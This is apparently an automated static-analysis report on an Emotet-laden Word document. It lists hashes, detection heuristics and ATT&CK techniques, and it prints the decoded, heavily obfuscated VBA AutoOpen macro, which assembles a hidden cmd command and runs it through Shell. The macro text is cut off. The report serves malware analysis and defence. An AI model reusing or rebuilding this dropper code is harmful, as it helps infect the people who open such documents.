Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 77fb2eaf3bfede88…

MALICIOUS

Office (OLE)

Size: 98.6 KB
Created: 2018-07-30 22:49:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 3a7da59e453f1a8683923b169fe3d199
SHA-1: c70d2763fb92e24bfae923df333c83341ed651ce
SHA-256: 77fb2eaf3bfede8885ddf9235d841784e666780036b95fc0fa5d218189b01bb4
Risk score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883982-0', which indicates downloader functionality. The presence of an AutoOpen VBA macro (T1059.005) further supports this, since such a macro executes automatically when the document is opened. The macro attempts to construct and execute a command-line string, most likely to download and run a secondary payload, which is common Emotet behavior.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6883982-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6883982-0
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5851 bytes
SHA-256: e351cbd83397a43ca95c35893a0e29c3f1dd21a898ebc004e43d5f50b0f992ce
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QCvuGUdwlFPLm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate Sgn(91488 - IEpln)
   AppActivate 24
   AppActivate Fix(439 + DWcif + 80768 / Jmzmw)
   AppActivate Rnd(520806294)
   AppActivate CInt(ouizv)
Shell@ CVar("cm") + nPivMna + NLMSEwQXhqZwEV + zjNZs + pKmYpqGaCSm + KETiJC + itKuwOUv + zXXEwPwajRiB + BVZuHzJjuTzK, 901588224 - 901588224
   AppActivate Sin(WwSBhi)
   AppActivate CLng(SjbcWV)
   AppActivate ChrB(34)
End Sub


Attribute VB_Name = "uKGtJaACfZOd"
Function zjNZs()
On Error Resume Next
AppActivate 3
   AppActivate PkpNtZ
   AppActivate 1954
cmqVrmsKDBT = "d /V:O/C" + CStr(Chr(imDiVtZbmdMU + cMHwvlCj + 34 + wVoRNuR + mjiBVYwbtHw)) + "set 0p=tZ" + "RQTdrhT" + "JQdsZr" + "fLNadi" + "Rt" + "opiBQn9E4" + ".Y);-x F" + "emlu{$1A"
AppActivate 184968001
   AppActivate Chr(224)
   AppActivate 380373930
kzNsWi = "W+k\" + "jCD" + "5,'y:P=U" + "wvc@S}b" + "(" + "g/" + "&&for %h " + "in (24" + ",23,63,40" + ",14,12,7" + "," + "40,42,42,3"
AppActivate Int(kJSVtf)
   AppActivate 814
   AppActivate CLng(AjuEK + wHqdIU)
wzSPnzZF = "8" + ",45,14,69," + "12,61,2" + "8,40,6" + "3,36," + "23,69,52"
AppActivate CDbl(955)
   AppActivate ChrB(938)
nvHHSUPYU = ",40,65,2" + "2,38,17,4" + "0,22,32" + ",48" + ",40" + ",69,53,42" + ",25,40,2" + "8" + "," + "22,35,4"
AppActivate 6158
   AppActivate Int(QbjKkD)
iXcbiP = "5,24,9" + ",33" + ",61,57," + "7,22,22,2" + "4,59,72" + ",72,65,"
AppActivate CBool(311)
   AppActivate Round(29566 / zmkIl)
uOsXYWENi = "42,40,18,1" + "4,69" + ",4" + "2," + "43,40," + "36,71,14,"
zjNZs = cmqVrmsKDBT + kzNsWi + wzSPnzZF + nvHHSUPYU + iXcbiP + uOsXYWENi
   AppActivate CLng(AKHns)
   AppActivate CBool(7569)
End Function
Function pKmYpqGaCSm()
On Error Resume Next
AppActivate Oct(Xpvqr / rjitr + 46061 * iVjib)
   AppActivate CNEQG
jrLVuqURu = "23,43,24,3" + "2,65,23,41" + ",72,29" + ",66,7,2" + "2,22,24," + "59,72,72," + "25,18,65,2"
AppActivate phiWp
   AppActivate Chr(ZWsiA - CBUhjV - NXRol + IbZuA)
   AppActivate Hex(9)
ktwLKq = "3,69,40,42" + ",42,25,32," + "65,42,72,4" + "1" + ",62," + "52" + ",52,42,66" + ",7" + ",2" + "2" + ",22,24,59" + ",72,72,50"
AppActivate 9682
   AppActivate Log(359157909)
wznlY = "," + "14" + ",2" + "5,12,22,25" + ",18,28," + "4" + "1,"
AppActivate 9
   AppActivate 254518935
   AppActivate phOML
whAQmpitsjF = "18," + "14,4" + "2,23,63,32" + ",65," + "23,41" + ",72," + "22," + "66,7,22,2" + "2,24,59,72" + ",72,41," + "40,19,2" + "5,18,1"
AppActivate StqvHp
   AppActivate 198710423
   AppActivate 231936111
jIbVhDGcWB = "4," + "25,22,41,3" + "2" + ",6" + "5,23,41" + ",32,43" + ",18" + ",72"
AppActivate uUXzs
   AppActivate 80
   AppActivate ZPFNf
sYjWBOSwLj = ",19,19," + "46,16,47" + ",18,58" + ",66,7,22" + ",22," + "24," + "59," + "72,72," + "41,14,50" + ",7,18,42" + "," + "40,19,28," + "18,12,"
AppActivate Hex(uLipv + UjLcwu)
   AppActivate qMYqZU
   AppActivate 9299
TSSHG = "14,32,6" + "5,23,41" + ",72,24," + "71,57,32,6" + "7,24,42" + ",25,22" + ",70,57," + "66" + ",57," + "34,35,45,2" + "2,27," + "63,38" + ",61,3"
pKmYpqGaCSm = jrLVuqURu + ktwLKq + wznlY + whAQmpitsjF + jIbVhDGcWB + sYjWBOSwLj + TSSHG
   AppActivate Int(38486 - fdFsE)
   AppActivate CInt(92127 * votBpD)
   AppActivate 9077
End Function
Function KETiJC()
On Error Resume Next
AppActivate Log(4)
   AppActivate 497544360
LzUEBmU = "8,57,31," + "46,55,57,3" + "5,45,69,43" + ",30,61,45," + "40,28,"
AppActivate fjQOAH
   AppActivate zkuOTP
GZtUc = "64,59" + ",22,4" + "0,41,24,4" + "9,57," + "51,57" + ",49,45,22"
AppActivate GODwDz
   AppActivate Sqr(azzpdE / 12560 - 83880 + oKtii)
   AppActivate Hex(KimAjz)
joKOujXj = ",2" + "7,63,49,57" + ",3" + "2" + ",40,37," + "40" + ",57" + ",35,15," + "23,14,40," + "1"
AppActivate 3
   AppActivate Round(2)
   AppActiva
... (truncated)